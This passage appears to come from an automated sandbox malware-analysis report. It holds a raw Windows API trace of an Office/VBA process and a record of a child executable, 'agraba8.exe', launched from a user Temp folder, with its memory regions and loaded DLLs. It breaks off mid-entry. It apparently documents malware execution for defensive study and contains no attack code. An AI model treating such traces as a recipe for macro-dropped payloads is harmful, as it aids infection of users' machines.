(This=0x7fefe015380, pv=0xb490bb0) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x7838620) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6840) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6210) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb524250) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x7667b00) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x7667890) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb51df40) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb51de80) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x7838590) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6370) [0129.251] wcsncpy_s (in: _Destination=0x2ec3f0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0129.252] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0129.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2ec320, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0129.252] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0129.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6390 [0129.252] IMalloc:Free (This=0x7fefe015380, pv=0xb4f63c0) [0129.252] IMalloc:Free (This=0x7fefe015380, pv=0x7667770) [0129.252] IMalloc:Free (This=0x7fefe015380, pv=0xb4f63b0) [0129.252] IMalloc:Free (This=0x7fefe015380, pv=0xb50c100) [0129.253] SetCursor (hCursor=0x10007) returned 0x10007 [0129.317] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0129.317] IsWindowVisible (hWnd=0x1023e) returned 0 [0129.317] lstrcpyA (in: lpString1=0x2ec470, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0129.317] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0129.317] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0129.318] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2ec600 | out: phkResult=0x2ec600*=0x624) returned 0x0 [0129.318] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.318] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.762] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x91e3308 [0129.762] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x1c, wParam=0x0, lParam=0x704) returned 0x0 [0129.762] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x91e3298 [0129.762] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x1c, wParam=0x0, lParam=0x704) returned 0x0 [0129.762] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x91e3228 [0129.762] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x1c, wParam=0x0, lParam=0x704) returned 0x0 [0129.762] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x91e31b8 [0129.762] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x1c, wParam=0x0, lParam=0x704) returned 0x0 [0129.762] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0x1c, wParam=0x0, lParam=0x704) returned 0x0 [0129.762] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x1c, wParam=0x0, lParam=0x704) returned 0x0 [0129.902] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0129.902] DefMDIChildProcA (hWnd=0x10226, uMsg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0129.902] DefMDIChildProcA (hWnd=0x10226, uMsg=0xd, wParam=0x208, lParam=0x2edf80) returned 0x0 [0129.902] DefMDIChildProcA (hWnd=0x10226, uMsg=0xd, wParam=0x208, lParam=0x2edfd0) returned 0x0 [0129.974] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x14b, wParam=0x0, lParam=0x0) returned 0x1 [0129.974] SendMessageA (hWnd=0x10238, Msg=0x184, wParam=0x0, lParam=0x0) returned 0x0 [0129.974] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x10238, Msg=0x184, wParam=0x0, lParam=0x0) returned 0x0 [0129.974] CallWindowProcA (lpPrevWndFunc=0xffff022d, hWnd=0x1023c, Msg=0xc, wParam=0x0, lParam=0x7fee3aa79b0) returned 0x1 [0129.974] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x111, wParam=0x4001004, lParam=0x1023c) returned 0x0 [0129.974] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x111, wParam=0x3001004, lParam=0x1023c) returned 0x0 [0129.974] IsWindowVisible (hWnd=0x1022e) returned 0 [0129.975] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0xc, wParam=0x0, lParam=0x93b9930) returned 0x1 [0129.975] GetWindowRect (in: hWnd=0x10236, lpRect=0x2ef4a0 | out: lpRect=0x2ef4a0) returned 1 [0129.975] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x1022e, lpPoints=0x2ef4a0, cPoints=0x2 | out: lpPoints=0x2ef4a0) returned -3080200 [0129.975] GetDC (hWnd=0x1022e) returned 0x180109b6 [0129.975] InflateRect (in: lprc=0x2ef490, dx=-1, dy=-1 | out: lprc=0x2ef490) returned 1 [0129.975] GetSysColor (nIndex=15) returned 0xf0f0f0 [0129.975] SetBkColor (hdc=0x180109b6, color=0xf0f0f0) returned 0xffffff [0129.975] ExtTextOutA (hdc=0x180109b6, x=2, y=58, options=0x6, lprect=0x2ef490, lpString="", c=0x0, lpDx=0x0) returned 1 [0129.975] ReleaseDC (hWnd=0x1022e, hDC=0x180109b6) returned 1 [0129.975] IsWindowVisible (hWnd=0x1022e) returned 0 [0129.984] lstrcpyA (in: lpString1=0x2ef030, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0129.984] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0129.984] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0129.984] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2ef1c0 | out: phkResult=0x2ef1c0*=0xa20) returned 0x0 [0129.984] lstrcpyA (in: lpString1=0x2ef060, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0129.984] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0129.984] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0129.984] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2ef1f0 | out: phkResult=0x2ef1f0*=0xa20) returned 0x0 [0129.985] lstrcpyA (in: lpString1=0x2ef0e0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0129.985] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0129.985] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0129.985] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2ef2a0 | out: phkResult=0x2ef2a0*=0xa20) returned 0x0 [0129.986] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x91e31b8 [0129.986] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0129.986] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x91e31b8 [0129.986] GetPropA (hWnd=0x1024a, lpString="VBAutomation") returned 0x0 [0129.986] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.986] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x91e31b8 [0129.986] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.986] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0129.986] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x210, wParam=0x2, lParam=0x1022e) returned 0x0 [0129.986] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0129.986] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0129.986] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.986] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.987] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.987] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x10238, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.987] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.987] CallWindowProcA (lpPrevWndFunc=0xffff022f, hWnd=0x1023a, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.987] CallWindowProcA (lpPrevWndFunc=0xffff022d, hWnd=0x1023c, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x1 [0129.987] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x10238, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.987] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x1 [0129.987] CallWindowProcA (lpPrevWndFunc=0xffff022f, hWnd=0x1023a, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.987] CallWindowProcA (lpPrevWndFunc=0xffff022d, hWnd=0x1023c, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.988] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.988] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x91e3298 [0129.988] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0129.988] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x91e3298 [0129.988] GetPropA (hWnd=0x1024e, lpString="VBAutomation") returned 0x0 [0129.988] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.988] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x91e3298 [0129.988] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.988] qsort (in: _Base=0x91de1e0, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee39392b4 | out: _Base=0x91de1e0) [0129.988] _msize (_Block=0x91de1e0) returned 0x1c0 [0129.988] OleTranslateColor () returned 0x0 [0129.988] UnrealizeObject (h=0x6100958) returned 1 [0129.990] NtdllDefWindowProc_A (hWnd=0x1022c, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0129.990] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x210, wParam=0x2, lParam=0x1022c) returned 0x0 [0129.990] NtdllDefWindowProc_A (hWnd=0x1022c, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.990] NtdllDefWindowProc_A (hWnd=0x1022c, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.990] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x91e3308 [0129.990] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0129.990] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x91e3308 [0129.990] GetPropA (hWnd=0x10250, lpString="VBAutomation") returned 0x0 [0129.990] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.990] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x91e3308 [0129.990] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.991] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0129.991] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x210, wParam=0x2, lParam=0x10228) returned 0x0 [0129.991] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0129.991] RevokeDragDrop (hwnd=0x1022a) returned 0x0 [0129.991] IsWindowVisible (hWnd=0x10222) returned 0 [0129.991] IsWindowVisible (hWnd=0x10222) returned 0 [0129.991] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.991] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.992] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.992] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.992] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x91e3228 [0129.992] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0129.992] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x91e3228 [0129.992] GetPropA (hWnd=0x1024c, lpString="VBAutomation") returned 0x0 [0129.992] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.993] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x91e3228 [0129.993] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.993] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x210, wParam=0xcac0002, lParam=0x10224) returned 0x0 [0129.993] DefMDIChildProcA (hWnd=0x10226, uMsg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.993] DefMDIChildProcA (hWnd=0x10226, uMsg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.996] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0129.997] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0129.997] GetPropA (hWnd=0x10222, lpString="VBAutomation") returned 0x91e37b8 [0129.997] GetPropA (hWnd=0x10222, lpString="VBAutomation") returned 0x91e37b8 [0129.997] RemovePropA (hWnd=0x10222, lpString="VBAutomation") returned 0x91e37b8 [0129.997] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0129.997] lstrcpyA (in: lpString1=0x2eed50, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0129.997] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0129.997] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0129.997] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2eeee0 | out: phkResult=0x2eeee0*=0xa20) returned 0x0 [0129.998] lstrcpyA (in: lpString1=0x2eedf0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0129.998] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0129.998] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0129.998] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2eefb8 | out: phkResult=0x2eefb8*=0xa20) returned 0x0 [0129.999] lstrcpyA (in: lpString1=0x2eed80, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0129.999] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0129.999] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0129.999] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2eef10 | out: phkResult=0x2eef10*=0xa70) returned 0x0 [0129.999] lstrcpyA (in: lpString1=0x2eed80, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0129.999] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0129.999] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0129.999] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2eef10 | out: phkResult=0x2eef10*=0xa70) returned 0x0 [0130.118] IMalloc:Free (This=0x7fefe015380, pv=0x766fc90) [0130.118] IMalloc:Free (This=0x7fefe015380, pv=0x76ce080) [0130.118] IMalloc:Free (This=0x7fefe015380, pv=0x74d8b10) [0130.118] IMalloc:Free (This=0x7fefe015380, pv=0xb3e5250) [0130.336] IMalloc:Free (This=0x7fefe015380, pv=0x7231da0) [0130.336] IMalloc:Free (This=0x7fefe015380, pv=0x7231170) [0130.336] IMalloc:Free (This=0x7fefe015380, pv=0x7231580) [0130.336] IMalloc:Free (This=0x7fefe015380, pv=0x7231990) [0130.336] DllDebugObjectRPCHook () returned 0x1 Thread: id = 15 os_tid = 0xa7c Thread: id = 16 os_tid = 0xa88 Thread: id = 17 os_tid = 0xa90 Thread: id = 18 os_tid = 0xa94 Thread: id = 19 os_tid = 0xa98 Thread: id = 20 os_tid = 0xa9c Thread: id = 21 os_tid = 0xaac Thread: id = 22 os_tid = 0xab0 Thread: id = 23 os_tid = 0xab4 Thread: id = 24 os_tid = 0xab8 Thread: id = 25 os_tid = 0xabc Thread: id = 26 os_tid = 0xac0 Thread: id = 27 os_tid = 0xac4 Thread: id = 28 os_tid = 0xac8 Thread: id = 29 os_tid = 0xb14 Thread: id = 30 os_tid = 0xb40 Thread: id = 31 os_tid = 0xb44 Thread: id = 32 os_tid = 0xb48 Thread: id = 33 os_tid = 0xb60 Thread: id = 34 os_tid = 0xb64 Thread: id = 36 os_tid = 0xb84 Thread: id = 38 os_tid = 0x874 Thread: id = 44 os_tid = 0x960 Process: id = "2" image_name = "agraba8.exe" filename = "c:\\users\\aetadzjz\\appdata\\local\\temp\\agraba8.exe" page_root = "0x4ec14000" os_pid = "0xb68" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9d8" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe\" " cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010cdc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 629 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 630 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 631 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 632 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 633 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 634 start_va = 0x400000 end_va = 0x4d9fff entry_point = 0x400000 region_type = mapped_file name = "agraba8.exe" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\agraba8.exe") Region: id = 635 start_va = 0x771d0000 end_va = 0x77378fff entry_point = 0x771d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 636 start_va = 0x773b0000 end_va = 0x7752ffff entry_point = 0x773b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 637 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 638 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 639 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 640 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 641 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 642 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 643 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 644 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 645 start_va = 0x290000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 646 start_va = 0x73a80000 end_va = 0x73adbfff entry_point = 0x73a80000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 647 start_va = 0x73ae0000 end_va = 0x73b1efff entry_point = 0x73ae0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 648 start_va = 0x73b50000 end_va = 0x73b57fff entry_point = 0x73b50000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 649 start_va = 0x5d0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 650 start_va = 0x751d0000 end_va = 0x752dffff entry_point = 0x751d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 651 start_va = 0x75ca0000 end_va = 0x75ce5fff entry_point = 0x75ca0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 652 start_va = 0x76fb0000 end_va = 0x770a9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fb0000" filename = "" Region: id = 653 start_va = 0x770b0000 end_va = 0x771cefff entry_point = 0x0 region_type = private name = "private_0x00000000770b0000" filename = "" Region: id = 654 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 655 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 656 start_va = 0x74ad0000 end_va = 0x74ae0fff entry_point = 0x74ad0000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\SysWOW64\\cryptdll.dll" (normalized: "c:\\windows\\syswow64\\cryptdll.dll") Region: id = 657 start_va = 0x74af0000 end_va = 0x74b2afff entry_point = 0x74af0000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\SysWOW64\\clusapi.dll" (normalized: "c:\\windows\\syswow64\\clusapi.dll") Region: id = 658 start_va = 0x74b30000 end_va = 0x74b43fff entry_point = 0x74b30000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\SysWOW64\\resutils.dll" (normalized: "c:\\windows\\syswow64\\resutils.dll") Region: id = 659 start_va = 0x74b50000 end_va = 0x74c85fff entry_point = 0x74b50000 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\SysWOW64\\comsvcs.dll" (normalized: "c:\\windows\\syswow64\\comsvcs.dll") Region: id = 660 start_va = 0x74c90000 end_va = 0x74ce5fff entry_point = 0x74c90000 region_type = mapped_file name = "certcli.dll" filename = "\\Windows\\SysWOW64\\certcli.dll" (normalized: "c:\\windows\\syswow64\\certcli.dll") Region: id = 661 start_va = 0x74de0000 end_va = 0x74df3fff entry_point = 0x74de0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 662 start_va = 0x74f00000 end_va = 0x74f0bfff entry_point = 0x74f00000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 663 start_va = 0x74f10000 end_va = 0x74f6ffff entry_point = 0x74f10000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 664 start_va = 0x74f70000 end_va = 0x750cbfff entry_point = 0x74f70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 665 start_va = 0x750d0000 end_va = 0x7516cfff entry_point = 0x750d0000 region_type = mapped_file name = "usp10.dll" filename = 